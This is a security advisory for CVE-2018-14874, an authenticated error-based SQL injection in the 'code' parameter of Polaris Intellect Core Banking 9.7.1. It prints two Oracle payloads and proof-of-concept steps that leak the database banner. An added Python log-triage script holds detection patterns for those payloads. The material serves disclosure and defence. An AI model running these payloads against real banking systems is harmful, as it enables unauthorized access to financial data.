Error Based SQL Injection Vulnerability in Polaris’ Intellect Core Banking Software Version 9.7.1 [CVE-2018-14874]


[+] Credits: Neeraj Kumar, Hai Dang Long
[+] Email: neeraj.iiita2009@gmail.com

Vendor:
====================

Product:
===================
Polaris’ Intellect Core Banking, Armor Module

Version:
===================
Affected Version: 9.7.1

Vulnerability Type:
==========================
Error Based SQL Injection vulnerability

CVE Reference:
==============
CVE-2018-14874

Vulnerability Details:
======================
SQL injection is common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. Intellect Core is core banking software used to manage core banking functions. In the Armor Module of Intellect Core, input passed through the 'code' parameter in three pages, 'collaterals/colexe3t.jsp', '/references/refsuppu.jsp' and '/references/refbranu.jsp', is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, destroy the data or make it otherwise unavailable, and escalate privileges to become administrator of the database server.
Note: The vulnerability is exploitable only with an authenticated session.

SQL Exploit Code(s):
====================
Payload:
1) ' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
2) '%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--


Affected Component:
====================
Parameter Name: code

Proof-of-Concept:
====================
1. Log in to the application.
2. Access the /refsuppu.jsp or /refbranu.jsp page.
3. Put the payloads below in the code parameter:
Payload-1:' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Payload-2:'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
4. It will give the database name in the error response.

Payload:
' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Figure (a): With Payload-1

'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
Figure (b): With Payload-2

Disclosure Timeline:
=====================
Vendor Notification: 17 June 2018
Mitre Notification: 3 August 2018
Public Disclosure: 31 March 2019

Attack Type:
=======================
Remote

Impact Code execution:
=======================
True

Impact Information Disclosure:
=======================
True

Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Intellect Core Banking Software (Polaris), Armor Module Version: 9.7.1
Vulnerable Parameter(s): [+] code
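
A log-triage check for the request pattern described in this advisory: GET requests that carry SQL in the 'code' parameter of the three affected Armor pages. This is an added example, not part of the original advisory or the vendor's code; the access-log layout, the constructed sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages named in the advisory, matched by file name because the deployed
# context path is not given on the page.
AFFECTED_PAGES = ("colexe3t.jsp", "refsuppu.jsp", "refbranu.jsp")

# Oracle objects referenced by the advisory's two payloads, plus the
# quote-then-boolean and trailing-comment shape both payloads share.
SUSPICIOUS = [
    ("ordsys.ord_dicom", re.compile(r"ordsys\.ord_dicom", re.I)),
    ("ctxsys.drithsx", re.compile(r"ctxsys\.drithsx", re.I)),
    ("v$version", re.compile(r"v\$version", re.I)),
    ("quote-boolean", re.compile(r"'\s*(or|and)\b", re.I)),
    ("trailing-comment", re.compile(r"--\s*$")),
]

# Assumption: Common Log Format style request field, e.g. "GET /x?y HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return labels of suspicious patterns in the 'code' parameter."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(AFFECTED_PAGES):
        return []
    hits = []
    # parse_qs percent-decodes values, so %20/%27-encoded requests are covered.
    for value in parse_qs(url.query, keep_blank_values=True).get("code", []):
        hits += [label for label, rx in SUSPICIOUS if rx.search(value)]
    return hits

def scan(lines):
    """Return (line_number, hits) for every log line that needs review."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := inspect_line(line))]

# Constructed sample lines (not taken from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - u1 [01/Jul/2018:10:00:01 +0000] "GET /references/refsuppu.jsp?code=SUP001 HTTP/1.1" 200 5120',
    '10.0.0.9 - u2 [01/Jul/2018:10:02:13 +0000] "GET /references/refbranu.jsp?code=%27%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))-- HTTP/1.1" 500 2048',
    '10.0.0.9 - u2 [01/Jul/2018:10:03:40 +0000] "GET /home.jsp?code=x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

The patterns are a triage heuristic for reviewing historical logs; the fix itself is binding 'code' as a query parameter instead of concatenating it into SQL.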

References:
=====================================================

[+] Disclaimer:
=====================================================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).
